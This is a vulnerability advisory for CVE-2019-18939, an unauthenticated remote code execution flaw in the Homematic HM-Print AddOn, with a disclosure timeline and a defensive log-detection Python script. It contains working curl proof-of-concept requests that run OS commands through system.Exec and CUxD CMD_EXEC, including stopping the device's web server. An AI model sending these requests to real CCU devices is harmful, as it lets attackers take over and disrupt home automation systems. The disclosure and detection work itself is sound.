CVE-2019-18939 eQ-3 Homematic AddOn 'HM-Print' version 1.2a and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of exec.cgi & exec1.cgi script, which executes TCL script content from HTTP POST request
Overview
- CVE: CVE-2019-18939
- Author: psytester
- Title: eQ-3 Homematic AddOn ‘HM-Print’ version 1.2a and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of exec.cgi & exec1.cgi script, which executes TCL script content from HTTP POST request
- Vulnerability Type: CWE-284: Improper Access Control
- CVSSv3 Base Score: 10.0
- CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Publishing Date: 14.11.2019
- Updated: 05.11.2020
- Vendor: eQ-3 AG; the CCU firmware provides the possibility to install AddOn software
- Product: Homematic CCU2 and CCU3
- Vendor eQ-3 contacted: 13.02.2019
- Vendor eQ-3 responded on 11.04.2019 with “not responsible for AddOns”
- Addon itself:
- Developer of ‘HM-Print’ AddOn contacted: 13.08.2019 as issue #4
- Developer of ‘HM-Print’ AddOn confirmation: N.A.
- ‘HM-Print’ AddOn patch: Version 2.3 released on 03.11.2020
- Affected ‘HM-Print’ AddOn version: 2.2, 2.1, 1.2a and prior
Background
From Github ‘HM-Print’ AddOn project page:
For documentation purposes it would sometimes be desirable to be able to print programs within the WebUI. Unfortunately, the interface does not offer a corresponding function. Also the built-in print function of the browser does not help, because scripts may remain unaffected by the printout. With this small AddOn this functionality can be easily retrofitted.
From eQ-3 vendor’s website for CCU2:
HomeMatic Central Control Unit CCU2
Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[….]
From eQ-3 vendor’s website for CCU3:
The Central Control Unit CCU3 is the central element for local control of the Homematic IP smart home system. It represents the next generation of our proven Homematic Central Control Units CCU1 and CCU2. Operation via the Central Control Unit CCU3 can be used alternatively to the Homematic IP Access Point. While the Access Point establishes the connection to the free Homematic IP cloud and enables operation of the smart home system via a smartphone app, the Central Control Unit CCU3 works locally via a browser-based web interface (WebUI). Thanks to local configuration and operation as well as the option to create direct device connections, reliable and fail-proof operation of the smart home system is guaranteed at all times – even in the event of Internet failures.
[….]
Issue Description
While analyzing the CCU web interface based on the page files in file system path /www, another Improper Access Control vulnerability resulting in Remote Code Execution was found, located in the ‘HM-Print’ AddOn if it is installed. The AddOn's exec.cgi and exec1.cgi scripts execute the HomeMatic script content of an HTTP POST body without any authentication, so this vulnerability can be exploited by unauthenticated attackers with access to the web interface.
The following HTTP requests (shown as curl commands) illustrate the attack vectors:
- RCE with the undocumented internal Homematic system.Exec() call on exec.cgi or exec1.cgi:
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("sleep 4;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("/bin/touch /tmp/testfile;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=system.Exec("/etc/init.d/S50lighttpd stop;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("sleep 4;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("/bin/touch /tmp/testfile;");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=system.Exec("/etc/init.d/S50lighttpd stop;");'
- If the popular CUxD AddOn is also installed, another RCE is possible by abuse of the virtual CUxD ‘CMD_EXEC’ device call on exec.cgi or exec1.cgi:
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/etc/init.d/S50lighttpd stop");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile");'
curl -X POST -i 'http://1.2.3.4/addons/print/exec1.cgi' --data 'var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/etc/init.d/S50lighttpd stop");'
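All of the requests above leave the same trace in the CCU's lighttpd access log (a POST to one of the two CGI paths), which gives defenders a simple detection hook. The following script is an added example, not part of the advisory or of the AddOn; it assumes lighttpd's default common/combined access log format and uses constructed sample lines. It flags POST requests to exec.cgi/exec1.cgi per source IP and also checks a captured request body (e.g. from a reverse proxy in front of the CCU) for the two script sinks the advisory names.

```python
import re
from collections import Counter

# Paths of the vulnerable CGI scripts named in the advisory (CVE-2019-18939)
VULN_PATHS = ("/addons/print/exec.cgi", "/addons/print/exec1.cgi")
# HomeMatic script sinks named in the advisory that lead to OS command execution
DANGEROUS_CALLS = ("system.Exec(", "CMD_EXEC")

# lighttpd access log, common/combined format (assumed; adjust if accesslog.format is customised)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_line(line):
    """Return the interesting fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_exec_cgi_post(entry):
    """True if the request is a POST (script in the body) to one of the exec CGIs."""
    path = entry["path"].split("?", 1)[0]          # ignore any query string
    return entry["method"] == "POST" and path in VULN_PATHS

def find_exec_cgi_posts(lines):
    """Return (ip, path, status) for every POST to exec.cgi / exec1.cgi."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_exec_cgi_post(entry):
            hits.append((entry["ip"], entry["path"].split("?", 1)[0], entry["status"]))
    return hits

def hits_per_source(lines):
    """Count flagged requests per source IP, so a scanning host stands out."""
    return Counter(ip for ip, _, _ in find_exec_cgi_posts(lines))

def body_has_exec_sink(body):
    """Return the dangerous script calls found in a captured POST body."""
    return [call for call in DANGEROUS_CALLS if call in body]

# Constructed sample log lines: one normal page view, two exploit-style POSTs, one harmless GET
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2019:10:00:01 +0100] "GET /addons/print/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [14/Nov/2019:10:00:05 +0100] "POST /addons/print/exec.cgi HTTP/1.1" 200 17 "-" "curl/7.64.1"',
    '192.0.2.77 - - [14/Nov/2019:10:00:06 +0100] "POST /addons/print/exec1.cgi HTTP/1.1" 200 17 "-" "curl/7.64.1"',
    '192.0.2.10 - - [14/Nov/2019:10:01:00 +0100] "GET /addons/print/exec.cgi?x=1 HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, status in find_exec_cgi_posts(SAMPLE_LOG):
        print(f"suspicious POST from {ip} to {path} (HTTP {status})")
```

Any POST to these paths is suspicious on a CCU, since the AddOn's own print page is the only legitimate caller and unauthenticated hits from unexpected hosts indicate exploitation attempts.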
Credit
Not owning an original CCU2 or CCU3, but you want to analyze the CCU ‘for free’? You can download:
- piVCCU for running the original CCU3 firmware in an LXC container on a Raspberry Pi
- RaspberryMatic for running the open source OCCU-based release on different boards
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.